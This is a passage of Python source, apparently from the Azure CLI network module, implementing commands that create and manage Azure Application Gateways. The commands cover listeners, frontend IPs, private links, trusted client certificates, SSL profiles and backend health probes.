connection_draining_timeout=0, enable_http2=None, min_capacity=None, zones=None,
custom_error_pages=None, firewall_policy=None, max_capacity=None,
user_assigned_identity=None,
enable_private_link=False,
private_link_ip_address=None,
private_link_subnet='PrivateLinkDefaultSubnet',
private_link_subnet_prefix='10.0.1.0/24',
private_link_primary=None,
trusted_client_cert=None,
ssl_profile=None,
ssl_profile_id=None,
ssl_cert_name=None):
from azure.cli.core.util import random_string
from azure.cli.core.commands.arm import ArmTemplateBuilder
from azure.cli.command_modules.network._template_builder import (
build_application_gateway_resource, build_public_ip_resource, build_vnet_resource)
DeploymentProperties = cmd.get_models('DeploymentProperties', resource_type=ResourceType.MGMT_RESOURCE_RESOURCES)
IPAllocationMethod = cmd.get_models('IPAllocationMethod')
tags = tags or {}
sku_tier = sku.split('_', 1)[0] if not _is_v2_sku(sku) else sku
http_listener_protocol = 'https' if (cert_data or key_vault_secret_id) else 'http'
private_ip_allocation = 'Static' if private_ip_address else 'Dynamic'
virtual_network_name = virtual_network_name or '{}Vnet'.format(application_gateway_name)
# Build up the ARM template
master_template = ArmTemplateBuilder()
ag_dependencies = []
public_ip_id = public_ip_address if is_valid_resource_id(public_ip_address) else None
subnet_id = subnet if is_valid_resource_id(subnet) else None
private_ip_allocation = IPAllocationMethod.static.value if private_ip_address \
else IPAllocationMethod.dynamic.value
network_id_template = resource_id(
subscription=get_subscription_id(cmd.cli_ctx), resource_group=resource_group_name,
namespace='Microsoft.Network')
if subnet_type == 'new':
ag_dependencies.append('Microsoft.Network/virtualNetworks/{}'.format(virtual_network_name))
vnet = build_vnet_resource(
cmd, virtual_network_name, location, tags, vnet_address_prefix, subnet,
subnet_address_prefix,
enable_private_link=enable_private_link,
private_link_subnet=private_link_subnet,
private_link_subnet_prefix=private_link_subnet_prefix)
master_template.add_resource(vnet)
subnet_id = '{}/virtualNetworks/{}/subnets/{}'.format(network_id_template,
virtual_network_name, subnet)
if public_ip_address_type == 'new':
ag_dependencies.append('Microsoft.Network/publicIpAddresses/{}'.format(public_ip_address))
public_ip_sku = None
if _is_v2_sku(sku):
public_ip_sku = 'Standard'
public_ip_address_allocation = 'Static'
master_template.add_resource(build_public_ip_resource(cmd, public_ip_address, location,
tags,
public_ip_address_allocation,
None, public_ip_sku, None))
public_ip_id = '{}/publicIPAddresses/{}'.format(network_id_template,
public_ip_address)
private_link_subnet_id = None
private_link_name = 'PrivateLinkDefaultConfiguration'
private_link_ip_allocation_method = 'Dynamic'
if enable_private_link:
private_link_subnet_id = '{}/virtualNetworks/{}/subnets/{}'.format(network_id_template,
virtual_network_name,
private_link_subnet)
private_link_ip_allocation_method = IPAllocationMethod.static.value if private_link_ip_address \
else IPAllocationMethod.dynamic.value
app_gateway_resource = build_application_gateway_resource(
cmd, application_gateway_name, location, tags, sku, sku_tier, capacity, servers, frontend_port,
private_ip_address, private_ip_allocation, cert_data, cert_password, key_vault_secret_id,
http_settings_cookie_based_affinity, http_settings_protocol, http_settings_port,
http_listener_protocol, routing_rule_type, public_ip_id, subnet_id,
connection_draining_timeout, enable_http2, min_capacity, zones, custom_error_pages,
firewall_policy, max_capacity, user_assigned_identity,
enable_private_link, private_link_name,
private_link_ip_address, private_link_ip_allocation_method, private_link_primary,
private_link_subnet_id, trusted_client_cert, ssl_profile, ssl_profile_id, ssl_cert_name)
app_gateway_resource['dependsOn'] = ag_dependencies
master_template.add_variable(
'appGwID',
"[resourceId('Microsoft.Network/applicationGateways', '{}')]".format(
application_gateway_name))
master_template.add_resource(app_gateway_resource)
master_template.add_output('applicationGateway', application_gateway_name, output_type='object')
if cert_password:
master_template.add_secure_parameter('certPassword', cert_password)
template = master_template.build()
parameters = master_template.build_parameters()
# deploy ARM template
deployment_name = 'ag_deploy_' + random_string(32)
client = get_mgmt_service_client(cmd.cli_ctx, ResourceType.MGMT_RESOURCE_RESOURCES).deployments
properties = DeploymentProperties(template=template, parameters=parameters, mode='incremental')
Deployment = cmd.get_models('Deployment', resource_type=ResourceType.MGMT_RESOURCE_RESOURCES)
deployment = Deployment(properties=properties)
if validate:
_log_pprint_template(template)
if cmd.supported_api_version(min_api='2019-10-01', resource_type=ResourceType.MGMT_RESOURCE_RESOURCES):
from azure.cli.core.commands import LongRunningOperation
validation_poller = client.begin_validate(resource_group_name, deployment_name, deployment)
return LongRunningOperation(cmd.cli_ctx)(validation_poller)
return client.validate(resource_group_name, deployment_name, deployment)
return sdk_no_wait(no_wait, client.begin_create_or_update, resource_group_name, deployment_name, deployment)
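# Illustrative CLI invocation for the command implemented above (a sketch; the option names
# are assumed from the parameters of create_application_gateway and from the module's
# _params.py, which is outside this file):
#
#     az network application-gateway create -g MyResourceGroup -n MyAppGateway \
#         --sku Standard_v2 --capacity 2 --frontend-port 80 --http-settings-port 80 \
#         --public-ip-address MyPublicIP --vnet-name MyVnet --subnet MySubnet \
#         --servers 10.0.0.4 10.0.0.5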
def update_application_gateway(cmd, instance, sku=None, capacity=None, tags=None, enable_http2=None, min_capacity=None,
custom_error_pages=None, max_capacity=None):
if sku is not None:
instance.sku.tier = sku.split('_', 1)[0] if not _is_v2_sku(sku) else sku
try:
if min_capacity is not None:
instance.autoscale_configuration.min_capacity = min_capacity
if max_capacity is not None:
instance.autoscale_configuration.max_capacity = max_capacity
except AttributeError:
instance.autoscale_configuration = {
'min_capacity': min_capacity,
'max_capacity': max_capacity
}
with cmd.update_context(instance) as c:
c.set_param('sku.name', sku)
c.set_param('sku.capacity', capacity)
c.set_param('tags', tags)
c.set_param('enable_http2', enable_http2)
c.set_param('custom_error_configurations', custom_error_pages)
return instance
def create_ag_authentication_certificate(cmd, resource_group_name, application_gateway_name, item_name,
cert_data, no_wait=False):
AuthCert = cmd.get_models('ApplicationGatewayAuthenticationCertificate')
ncf = network_client_factory(cmd.cli_ctx).application_gateways
ag = ncf.get(resource_group_name, application_gateway_name)
new_cert = AuthCert(data=cert_data, name=item_name)
upsert_to_collection(ag, 'authentication_certificates', new_cert, 'name')
return sdk_no_wait(no_wait, ncf.begin_create_or_update, resource_group_name, application_gateway_name, ag)
def update_ag_authentication_certificate(instance, parent, item_name, cert_data):
instance.data = cert_data
return parent
def create_ag_backend_address_pool(cmd, resource_group_name, application_gateway_name, item_name,
servers=None, no_wait=False):
ApplicationGatewayBackendAddressPool = cmd.get_models('ApplicationGatewayBackendAddressPool')
ncf = network_client_factory(cmd.cli_ctx)
ag = ncf.application_gateways.get(resource_group_name, application_gateway_name)
new_pool = ApplicationGatewayBackendAddressPool(name=item_name, backend_addresses=servers)
upsert_to_collection(ag, 'backend_address_pools', new_pool, 'name')
return sdk_no_wait(no_wait, ncf.application_gateways.begin_create_or_update,
resource_group_name, application_gateway_name, ag)
def update_ag_backend_address_pool(instance, parent, item_name, servers=None):
if servers is not None:
instance.backend_addresses = servers
return parent
def create_ag_frontend_ip_configuration(cmd, resource_group_name, application_gateway_name, item_name,
public_ip_address=None, subnet=None,
virtual_network_name=None, private_ip_address=None,
private_ip_address_allocation=None, no_wait=False):
ApplicationGatewayFrontendIPConfiguration, SubResource = cmd.get_models(
'ApplicationGatewayFrontendIPConfiguration', 'SubResource')
ncf = network_client_factory(cmd.cli_ctx)
ag = ncf.application_gateways.get(resource_group_name, application_gateway_name)
if public_ip_address:
new_config = ApplicationGatewayFrontendIPConfiguration(
name=item_name,
public_ip_address=SubResource(id=public_ip_address))
else:
new_config = ApplicationGatewayFrontendIPConfiguration(
name=item_name,
private_ip_address=private_ip_address if private_ip_address else None,
private_ip_allocation_method='Static' if private_ip_address else 'Dynamic',
subnet=SubResource(id=subnet))
upsert_to_collection(ag, 'frontend_ip_configurations', new_config, 'name')
return sdk_no_wait(no_wait, ncf.application_gateways.begin_create_or_update,
resource_group_name, application_gateway_name, ag)
def update_ag_frontend_ip_configuration(cmd, instance, parent, item_name, public_ip_address=None,
subnet=None, virtual_network_name=None,
private_ip_address=None):
SubResource = cmd.get_models('SubResource')
if public_ip_address is not None:
instance.public_ip_address = SubResource(id=public_ip_address)
if subnet is not None:
instance.subnet = SubResource(id=subnet)
if private_ip_address is not None:
instance.private_ip_address = private_ip_address
instance.private_ip_allocation_method = 'Static'
return parent
def create_ag_frontend_port(cmd, resource_group_name, application_gateway_name, item_name, port,
no_wait=False):
ApplicationGatewayFrontendPort = cmd.get_models('ApplicationGatewayFrontendPort')
ncf = network_client_factory(cmd.cli_ctx)
ag = ncf.application_gateways.get(resource_group_name, application_gateway_name)
new_port = ApplicationGatewayFrontendPort(name=item_name, port=port)
upsert_to_collection(ag, 'frontend_ports', new_port, 'name')
return sdk_no_wait(no_wait, ncf.application_gateways.begin_create_or_update,
resource_group_name, application_gateway_name, ag)
def update_ag_frontend_port(instance, parent, item_name, port=None):
if port is not None:
instance.port = port
return parent
def create_ag_http_listener(cmd, resource_group_name, application_gateway_name, item_name,
frontend_port, frontend_ip=None, host_name=None, ssl_cert=None,
ssl_profile=None, firewall_policy=None, no_wait=False, host_names=None):
ApplicationGatewayHttpListener, SubResource = cmd.get_models('ApplicationGatewayHttpListener', 'SubResource')
ncf = network_client_factory(cmd.cli_ctx)
ag = ncf.application_gateways.get(resource_group_name, application_gateway_name)
if not frontend_ip:
frontend_ip = _get_default_id(ag, 'frontend_ip_configurations', '--frontend-ip')
new_listener = ApplicationGatewayHttpListener(
name=item_name,
frontend_ip_configuration=SubResource(id=frontend_ip),
frontend_port=SubResource(id=frontend_port),
host_name=host_name,
require_server_name_indication=True if ssl_cert and host_name else None,
protocol='https' if ssl_cert else 'http',
ssl_certificate=SubResource(id=ssl_cert) if ssl_cert else None,
host_names=host_names
)
if cmd.supported_api_version(min_api='2019-09-01'):
new_listener.firewall_policy = SubResource(id=firewall_policy) if firewall_policy else None
if cmd.supported_api_version(min_api='2020-06-01'):
new_listener.ssl_profile = SubResource(id=ssl_profile) if ssl_profile else None
upsert_to_collection(ag, 'http_listeners', new_listener, 'name')
return sdk_no_wait(no_wait, ncf.application_gateways.begin_create_or_update,
resource_group_name, application_gateway_name, ag)
def update_ag_http_listener(cmd, instance, parent, item_name, frontend_ip=None, frontend_port=None,
host_name=None, ssl_cert=None, ssl_profile=None, firewall_policy=None, host_names=None):
SubResource = cmd.get_models('SubResource')
if frontend_ip is not None:
instance.frontend_ip_configuration = SubResource(id=frontend_ip)
if frontend_port is not None:
instance.frontend_port = SubResource(id=frontend_port)
if ssl_cert is not None:
if ssl_cert:
instance.ssl_certificate = SubResource(id=ssl_cert)
instance.protocol = 'Https'
else:
instance.ssl_certificate = None
instance.protocol = 'Http'
if host_name is not None:
instance.host_name = host_name or None
if cmd.supported_api_version(min_api='2019-09-01'):
if firewall_policy is not None:
instance.firewall_policy = SubResource(id=firewall_policy)
if cmd.supported_api_version(min_api='2020-06-01'):
if ssl_profile is not None:
instance.ssl_profile = SubResource(id=ssl_profile)
if host_names is not None:
instance.host_names = host_names or None
instance.require_server_name_indication = instance.host_name and instance.protocol.lower() == 'https'
return parent
def assign_ag_identity(cmd, resource_group_name, application_gateway_name,
user_assigned_identity, no_wait=False):
ncf = network_client_factory(cmd.cli_ctx).application_gateways
ag = ncf.get(resource_group_name, application_gateway_name)
ManagedServiceIdentity, ManagedServiceIdentityUserAssignedIdentitiesValue = \
cmd.get_models('ManagedServiceIdentity',
'Components1Jq1T4ISchemasManagedserviceidentityPropertiesUserassignedidentitiesAdditionalproperties') # pylint: disable=line-too-long
    user_assigned_identity_instance = ManagedServiceIdentityUserAssignedIdentitiesValue()
    user_assigned_identities_instance = dict()
    user_assigned_identities_instance[user_assigned_identity] = user_assigned_identity_instance
identity_instance = ManagedServiceIdentity(
type="UserAssigned",
user_assigned_identities=user_assigned_identities_instance
)
ag.identity = identity_instance
return sdk_no_wait(no_wait, ncf.begin_create_or_update, resource_group_name, application_gateway_name, ag)
def remove_ag_identity(cmd, resource_group_name, application_gateway_name, no_wait=False):
ncf = network_client_factory(cmd.cli_ctx).application_gateways
ag = ncf.get(resource_group_name, application_gateway_name)
if ag.identity is None:
logger.warning("This command will be ignored. The identity doesn't exist.")
ag.identity = None
return sdk_no_wait(no_wait, ncf.begin_create_or_update, resource_group_name, application_gateway_name, ag)
def show_ag_identity(cmd, resource_group_name, application_gateway_name):
ncf = network_client_factory(cmd.cli_ctx).application_gateways
ag = ncf.get(resource_group_name, application_gateway_name)
if ag.identity is None:
raise CLIError("Please first use 'az network application-gateway identity assign` to init the identity.")
return ag.identity
def add_ag_private_link(cmd,
resource_group_name,
application_gateway_name,
frontend_ip,
private_link_name,
private_link_subnet_name_or_id,
private_link_subnet_prefix=None,
private_link_primary=None,
private_link_ip_address=None,
no_wait=False):
(SubResource, IPAllocationMethod, Subnet,
ApplicationGatewayPrivateLinkConfiguration,
ApplicationGatewayPrivateLinkIpConfiguration) = cmd.get_models(
'SubResource', 'IPAllocationMethod', 'Subnet',
'ApplicationGatewayPrivateLinkConfiguration', 'ApplicationGatewayPrivateLinkIpConfiguration')
ncf = network_client_factory(cmd.cli_ctx)
appgw = ncf.application_gateways.get(resource_group_name, application_gateway_name)
private_link_config_id = resource_id(
subscription=get_subscription_id(cmd.cli_ctx),
resource_group=resource_group_name,
namespace='Microsoft.Network',
type='applicationGateways',
name=appgw.name,
child_type_1='privateLinkConfigurations',
child_name_1=private_link_name
)
if not any(fic for fic in appgw.frontend_ip_configurations if fic.name == frontend_ip):
raise CLIError("Frontend IP doesn't exist")
for fic in appgw.frontend_ip_configurations:
if fic.private_link_configuration and fic.private_link_configuration.id == private_link_config_id:
            raise CLIError('Frontend IP already references an existing Private Link')
if fic.name == frontend_ip:
break
else:
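        # for/else: this branch runs only when the loop finishes without a break,
        # i.e. no frontend IP configuration named `frontend_ip` was found.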
raise CLIError("Frontend IP doesn't exist")
for pl in appgw.private_link_configurations:
if pl.name == private_link_name:
            raise CLIError('Private Link name already exists')
# get the virtual network of this application gateway
vnet_name = parse_resource_id(appgw.gateway_ip_configurations[0].subnet.id)['name']
vnet = ncf.virtual_networks.get(resource_group_name, vnet_name)
# prepare the subnet for new private link
    for subnet in vnet.subnets:
        if subnet.name == private_link_subnet_name_or_id:
            raise CLIError('A subnet with this name already exists')
        if subnet.address_prefix == private_link_subnet_prefix:
            raise CLIError('A subnet with this address prefix already exists')
        if subnet.address_prefixes and private_link_subnet_prefix in subnet.address_prefixes:
            raise CLIError('A subnet with this address prefix already exists')
if is_valid_resource_id(private_link_subnet_name_or_id):
private_link_subnet_id = private_link_subnet_name_or_id
else:
private_link_subnet = Subnet(name=private_link_subnet_name_or_id,
address_prefix=private_link_subnet_prefix,
private_link_service_network_policies='Disabled')
private_link_subnet_id = resource_id(
subscription=get_subscription_id(cmd.cli_ctx),
resource_group=resource_group_name,
namespace='Microsoft.Network',
type='virtualNetworks',
name=vnet_name,
child_type_1='subnets',
child_name_1=private_link_subnet_name_or_id
)
vnet.subnets.append(private_link_subnet)
ncf.virtual_networks.begin_create_or_update(resource_group_name, vnet_name, vnet)
private_link_ip_allocation_method = IPAllocationMethod.static.value if private_link_ip_address \
else IPAllocationMethod.dynamic.value
private_link_ip_config = ApplicationGatewayPrivateLinkIpConfiguration(
name='PrivateLinkDefaultIPConfiguration',
private_ip_address=private_link_ip_address,
private_ip_allocation_method=private_link_ip_allocation_method,
subnet=SubResource(id=private_link_subnet_id),
primary=private_link_primary
)
private_link_config = ApplicationGatewayPrivateLinkConfiguration(
name=private_link_name,
ip_configurations=[private_link_ip_config]
)
# associate the private link with the frontend IP configuration
for fic in appgw.frontend_ip_configurations:
if fic.name == frontend_ip:
fic.private_link_configuration = SubResource(id=private_link_config_id)
appgw.private_link_configurations.append(private_link_config)
return sdk_no_wait(no_wait,
ncf.application_gateways.begin_create_or_update,
resource_group_name,
application_gateway_name, appgw)
def show_ag_private_link(cmd,
resource_group_name,
application_gateway_name,
private_link_name):
ncf = network_client_factory(cmd.cli_ctx)
appgw = ncf.application_gateways.get(resource_group_name, application_gateway_name)
target_private_link = None
for pl in appgw.private_link_configurations:
if pl.name == private_link_name:
target_private_link = pl
break
else:
raise CLIError("Priavte Link doesn't exist")
return target_private_link
def list_ag_private_link(cmd,
resource_group_name,
application_gateway_name):
ncf = network_client_factory(cmd.cli_ctx)
appgw = ncf.application_gateways.get(resource_group_name, application_gateway_name)
return appgw.private_link_configurations
def remove_ag_private_link(cmd,
resource_group_name,
application_gateway_name,
private_link_name,
no_wait=False):
ncf = network_client_factory(cmd.cli_ctx)
appgw = ncf.application_gateways.get(resource_group_name, application_gateway_name)
removed_private_link = None
for pl in appgw.private_link_configurations:
if pl.name == private_link_name:
removed_private_link = pl
break
else:
raise CLIError("Priavte Link doesn't exist")
for fic in appgw.frontend_ip_configurations:
if fic.private_link_configuration and fic.private_link_configuration.id == removed_private_link.id:
fic.private_link_configuration = None
    # the leftover subnet/vnet has to be deleted manually (see the commented-out code below)
# rs = parse_resource_id(removed_private_link.ip_configurations[0].subnet.id)
# vnet_resource_group, vnet_name, subnet = rs['resource_group'], rs['name'], rs['child_name_1']
# ncf.subnets.delete(vnet_resource_group, vnet_name, subnet)
appgw.private_link_configurations.remove(removed_private_link)
return sdk_no_wait(no_wait,
ncf.application_gateways.begin_create_or_update,
resource_group_name,
application_gateway_name,
appgw)
# region application-gateway trusted-client-certificates
def add_trusted_client_certificate(cmd, resource_group_name, application_gateway_name, client_cert_name,
client_cert_data, no_wait=False):
ncf = network_client_factory(cmd.cli_ctx)
appgw = ncf.application_gateways.get(resource_group_name, application_gateway_name)
ApplicationGatewayTrustedClientCertificate = cmd.get_models('ApplicationGatewayTrustedClientCertificate')
cert = ApplicationGatewayTrustedClientCertificate(name=client_cert_name, data=client_cert_data)
appgw.trusted_client_certificates.append(cert)
return sdk_no_wait(no_wait, ncf.application_gateways.begin_create_or_update, resource_group_name,
application_gateway_name, appgw)
def update_trusted_client_certificate(cmd, resource_group_name, application_gateway_name, client_cert_name,
client_cert_data, no_wait=False):
ncf = network_client_factory(cmd.cli_ctx)
appgw = ncf.application_gateways.get(resource_group_name, application_gateway_name)
for cert in appgw.trusted_client_certificates:
if cert.name == client_cert_name:
cert.data = client_cert_data
break
else:
raise ResourceNotFoundError(f"Trusted client certificate {client_cert_name} doesn't exist")
return sdk_no_wait(no_wait, ncf.application_gateways.begin_create_or_update, resource_group_name,
application_gateway_name, appgw)
def list_trusted_client_certificate(cmd, resource_group_name, application_gateway_name):
ncf = network_client_factory(cmd.cli_ctx)
appgw = ncf.application_gateways.get(resource_group_name, application_gateway_name)
return appgw.trusted_client_certificates
def remove_trusted_client_certificate(cmd, resource_group_name, application_gateway_name, client_cert_name,
no_wait=False):
ncf = network_client_factory(cmd.cli_ctx)
appgw = ncf.application_gateways.get(resource_group_name, application_gateway_name)
for cert in appgw.trusted_client_certificates:
if cert.name == client_cert_name:
appgw.trusted_client_certificates.remove(cert)
break
else:
raise ResourceNotFoundError(f"Trusted client certificate {client_cert_name} doesn't exist")
return sdk_no_wait(no_wait, ncf.application_gateways.begin_create_or_update, resource_group_name,
application_gateway_name, appgw)
def show_trusted_client_certificate(cmd, resource_group_name, application_gateway_name, client_cert_name):
ncf = network_client_factory(cmd.cli_ctx)
appgw = ncf.application_gateways.get(resource_group_name, application_gateway_name)
instance = None
for cert in appgw.trusted_client_certificates:
if cert.name == client_cert_name:
instance = cert
break
else:
raise ResourceNotFoundError(f"Trusted client certificate {client_cert_name} doesn't exist")
return instance
def show_ag_backend_health(cmd, client, resource_group_name, application_gateway_name, expand=None,
protocol=None, host=None, path=None, timeout=None, host_name_from_http_settings=None,
match_body=None, match_status_codes=None, address_pool=None, http_settings=None):
from azure.cli.core.commands import LongRunningOperation
on_demand_arguments = {protocol, host, path, timeout, host_name_from_http_settings, match_body, match_status_codes,
address_pool, http_settings}
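    # If any on-demand probe argument was supplied (the set contains something other than
    # None) and the API version supports it, run an on-demand backend health probe;
    # otherwise fall back to the plain backend health call at the end of this function.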
if on_demand_arguments.difference({None}) and cmd.supported_api_version(min_api='2019-04-01'):
SubResource, ApplicationGatewayOnDemandProbe, ApplicationGatewayProbeHealthResponseMatch = cmd.get_models(
"SubResource", "ApplicationGatewayOnDemandProbe", "ApplicationGatewayProbeHealthResponseMatch")
probe_request = ApplicationGatewayOnDemandProbe(
protocol=protocol,
host=host,
path=path,
timeout=timeout,
pick_host_name_from_backend_http_settings=host_name_from_http_settings
)
if match_body is not None or match_status_codes is not None:
probe_request.match = ApplicationGatewayProbeHealthResponseMatch(
body=match_body,
status_codes=match_status_codes,
)
if address_pool is not None:
if not is_valid_resource_id(address_pool):
address_pool = resource_id(
subscription=get_subscription_id(cmd.cli_ctx),
resource_group=resource_group_name,
namespace='Microsoft.Network',
type='applicationGateways',
name=application_gateway_name,
child_type_1='backendAddressPools',
child_name_1=address_pool
)
probe_request.backend_address_pool = SubResource(id=address_pool)
if http_settings is not None:
if not is_valid_resource_id(http_settings):
http_settings = resource_id(
subscription=get_subscription_id(cmd.cli_ctx),
resource_group=resource_group_name,
namespace='Microsoft.Network',
type='applicationGateways',
name=application_gateway_name,
child_type_1='backendHttpSettingsCollection',
child_name_1=http_settings
)
probe_request.backend_http_settings = SubResource(id=http_settings)
return LongRunningOperation(cmd.cli_ctx)(client.begin_backend_health_on_demand(
resource_group_name, application_gateway_name, probe_request, expand))
return LongRunningOperation(cmd.cli_ctx)(client.begin_backend_health(
resource_group_name, application_gateway_name, expand))
# endregion
# region application-gateway ssl-profile
def add_ssl_profile(cmd, resource_group_name, application_gateway_name, ssl_profile_name, policy_name=None,
policy_type=None, min_protocol_version=None, cipher_suites=None, disabled_ssl_protocols=None,
trusted_client_certificates=None, client_auth_configuration=None, no_wait=False):
ncf = network_client_factory(cmd.cli_ctx)
appgw = ncf.application_gateways.get(resource_group_name, application_gateway_name)
(SubResource,
ApplicationGatewaySslPolicy,
ApplicationGatewayClientAuthConfiguration,
ApplicationGatewaySslProfile) = cmd.get_models('SubResource',
'ApplicationGatewaySslPolicy',
'ApplicationGatewayClientAuthConfiguration',
'ApplicationGatewaySslProfile')
sr_trusted_client_certificates = [SubResource(id=item) for item in
trusted_client_certificates] if trusted_client_certificates else None
ssl_policy = ApplicationGatewaySslPolicy(policy_name=policy_name, policy_type=policy_type,
min_protocol_version=min_protocol_version,
cipher_suites=cipher_suites, disabled_ssl_protocols=disabled_ssl_protocols)
client_auth = ApplicationGatewayClientAuthConfiguration(
verify_client_cert_issuer_dn=client_auth_configuration) if client_auth_configuration else None
ssl_profile = ApplicationGatewaySslProfile(trusted_client_certificates=sr_trusted_client_certificates,
ssl_policy=ssl_policy, client_auth_configuration=client_auth,
name=ssl_profile_name)
appgw.ssl_profiles.append(ssl_profile)
return sdk_no_wait(no_wait, ncf.application_gateways.begin_create_or_update, resource_group_name,
application_gateway_name, appgw)
def update_ssl_profile(cmd, resource_group_name, application_gateway_name, ssl_profile_name, policy_name=None,
policy_type=None, min_protocol_version=None, cipher_suites=None, disabled_ssl_protocols=None,
trusted_client_certificates=None, client_auth_configuration=None, no_wait=False):
ncf = network_client_factory(cmd.cli_ctx)
appgw = ncf.application_gateways.get(resource_group_name, application_gateway_name)
instance = None
for profile in appgw.ssl_profiles:
if profile.name == ssl_profile_name:
instance = profile
break
else:
raise ResourceNotFoundError(f"Ssl profiles {ssl_profile_name} doesn't exist")
if policy_name is not None:
instance.ssl_policy.policy_name = policy_name
if policy_type is not None:
instance.ssl_policy.policy_type = policy_type
if min_protocol_version is not None:
instance.ssl_policy.min_protocol_version = min_protocol_version
if cipher_suites is not None:
instance.ssl_policy.cipher_suites = cipher_suites
if disabled_ssl_protocols is not None:
instance.ssl_policy.disabled_ssl_protocols = disabled_ssl_protocols
if trusted_client_certificates is not None:
SubResource = cmd.get_models('SubResource')
instance.trusted_client_certificates = [SubResource(id=item) for item in trusted_client_certificates]
if client_auth_configuration is not None:
ApplicationGatewayClientAuthConfiguration = cmd.get_models('ApplicationGatewayClientAuthConfiguration')
instance.client_auth_configuration = ApplicationGatewayClientAuthConfiguration(
verify_client_cert_issuer_dn=(client_auth_configuration == 'True')
)
return sdk_no_wait(no_wait, ncf.application_gateways.begin_create_or_update, resource_group_name,
application_gateway_name, appgw)
def list_ssl_profile(cmd, resource_group_name, application_gateway_name):
ncf = network_client_factory(cmd.cli_ctx)
appgw = ncf.application_gateways.get(resource_group_name, application_gateway_name)
return appgw.ssl_profiles
def remove_ssl_profile(cmd, resource_group_name, application_gateway_name, ssl_profile_name, no_wait=False):
ncf = network_client_factory(cmd.cli_ctx)
appgw = ncf.application_gateways.get(resource_group_name, application_gateway_name)
for profile in appgw.ssl_profiles:
if profile.name == ssl_profile_name:
appgw.ssl_profiles.remove(profile)
break
else:
raise ResourceNotFoundError(f"Ssl profiles {ssl_profile_name} doesn't exist")
return sdk_no_wait(no_wait, ncf.application_gateways.begin_create_or_update, resource_group_name,
application_gateway_name, appgw)
def show_ssl_profile(cmd, resource_group_name, application_gateway_name, ssl_profile_name):
ncf = network_client_factory(cmd.cli_ctx)
appgw = ncf.application_gateways.get(resource_group_name, application_gateway_name)
instance = None
for profile in appgw.ssl_profiles:
if profile.name == ssl_profile_name:
instance = profile
break
else:
raise ResourceNotFoundError(f"Ssl profiles {ssl_profile_name} doesn't exist")
return instance
# endregion
def add_ag_private_link_ip(cmd,
resource_group_name,
application_gateway_name,
private_link_name,
private_link_ip_name,
private_link_primary=False,
private_link_ip_address=None,
no_wait=False):
ncf = network_client_factory(cmd.cli_ctx)
appgw = ncf.application_gateways.get(resource_group_name, application_gateway_name)
target_private_link = None
for pl in appgw.private_link_configurations:
if pl.name == private_link_name:
target_private_link = pl
break
else:
raise CLIError("Priavte Link doesn't exist")
(SubResource, IPAllocationMethod,
ApplicationGatewayPrivateLinkIpConfiguration) = \
cmd.get_models('SubResource', 'IPAllocationMethod',
'ApplicationGatewayPrivateLinkIpConfiguration')
private_link_subnet_id = target_private_link.ip_configurations[0].subnet.id
private_link_ip_allocation_method = IPAllocationMethod.static.value if private_link_ip_address \
else IPAllocationMethod.dynamic.value
private_link_ip_config = ApplicationGatewayPrivateLinkIpConfiguration(
name=private_link_ip_name,
private_ip_address=private_link_ip_address,
private_ip_allocation_method=private_link_ip_allocation_method,
subnet=SubResource(id=private_link_subnet_id),
primary=private_link_primary
)
target_private_link.ip_configurations.append(private_link_ip_config)
return sdk_no_wait(no_wait,
ncf.application_gateways.begin_create_or_update,
resource_group_name,
application_gateway_name,
appgw)
def show_ag_private_link_ip(cmd,
resource_group_name,
application_gateway_name,
private_link_name,
private_link_ip_name):
ncf = network_client_factory(cmd.cli_ctx)
appgw = ncf.application_gateways.get(resource_group_name, application_gateway_name)
target_private_link = None
for pl in appgw.private_link_configurations:
if pl.name == private_link_name:
target_private_link = pl
break
else:
raise CLIError("Priavte Link doesn't exist")
target_private_link_ip_config = None
for pic in target_private_link.ip_configurations:
if pic.name == private_link_ip_name:
target_private_link_ip_config = pic
break
else:
raise CLIError("IP Configuration doesn't exist")
return target_private_link_ip_config
def list_ag_private_link_ip(cmd,
resource_group_name,
application_gateway_name,
private_link_name):
ncf = network_client_factory(cmd.cli_ctx)
appgw = ncf.application_gateways.get(resource_group_name, application_gateway_name)
target_private_link = None
for pl in appgw.private_link_configurations:
if pl.name == private_link_name:
target_private_link = pl
break
else:
raise CLIError("Priavte Link doesn't exist")
return target_private_link.ip_configurations
def remove_ag_private_link_ip(cmd,
resource_group_name,
application_gateway_name,
private_link_name,
private_link_ip_name,
no_wait=False):
ncf = network_client_factory(cmd.cli_ctx)
appgw = ncf.application_gateways.get(resource_group_name, application_gateway_name)
target_private_link = None
for pl in appgw.private_link_configurations:
if pl.name == private_link_name:
target_private_link = pl
break
else:
raise CLIError("Priavte Link doesn't exist")
updated_ip_configurations = target_private_link.ip_configurations
for pic in target_private_link.ip_configurations:
if pic.name == private_link_ip_name:
updated_ip_configurations.remove(pic)
break
else:
raise CLIError("IP Configuration doesn't exist")
return sdk_no_wait(no_wait,
ncf.application_gateways.begin_create_or_update,
resource_group_name,
application_gateway_name,
appgw)
def create_ag_backend_http_settings_collection(cmd, resource_group_name, application_gateway_name, item_name, port,
probe=None, protocol='http', cookie_based_affinity=None, timeout=None,
no_wait=False, connection_draining_timeout=0,
host_name=None, host_name_from_backend_pool=None,
affinity_cookie_name=None, enable_probe=None, path=None,
auth_certs=None, root_certs=None):
ApplicationGatewayBackendHttpSettings, ApplicationGatewayConnectionDraining, SubResource = cmd.get_models(
'ApplicationGatewayBackendHttpSettings', 'ApplicationGatewayConnectionDraining', 'SubResource')
ncf = network_client_factory(cmd.cli_ctx)
ag = ncf.application_gateways.get(resource_group_name, application_gateway_name)
new_settings = ApplicationGatewayBackendHttpSettings(
port=port,
protocol=protocol,
cookie_based_affinity=cookie_based_affinity or 'Disabled',
request_timeout=timeout,
probe=SubResource(id=probe) if probe else None,
name=item_name)
if cmd.supported_api_version(min_api='2016-09-01'):
new_settings.authentication_certificates = [SubResource(id=x) for x in auth_certs or []]
if cmd.supported_api_version(min_api='2016-12-01'):
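        # A connection_draining_timeout of 0 means draining is disabled; the model still
        # expects a positive drain_timeout_in_sec, hence the `or 1` fallback below.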
new_settings.connection_draining = \
ApplicationGatewayConnectionDraining(
enabled=bool(connection_draining_timeout), drain_timeout_in_sec=connection_draining_timeout or 1)
if cmd.supported_api_version(min_api='2017-06-01'):
new_settings.host_name = host_name
new_settings.pick_host_name_from_backend_address = host_name_from_backend_pool
new_settings.affinity_cookie_name = affinity_cookie_name
new_settings.probe_enabled = enable_probe
new_settings.path = path
if cmd.supported_api_version(min_api='2019-04-01'):
new_settings.trusted_root_certificates = [SubResource(id=x) for x in root_certs or []]
upsert_to_collection(ag, 'backend_http_settings_collection', new_settings, 'name')
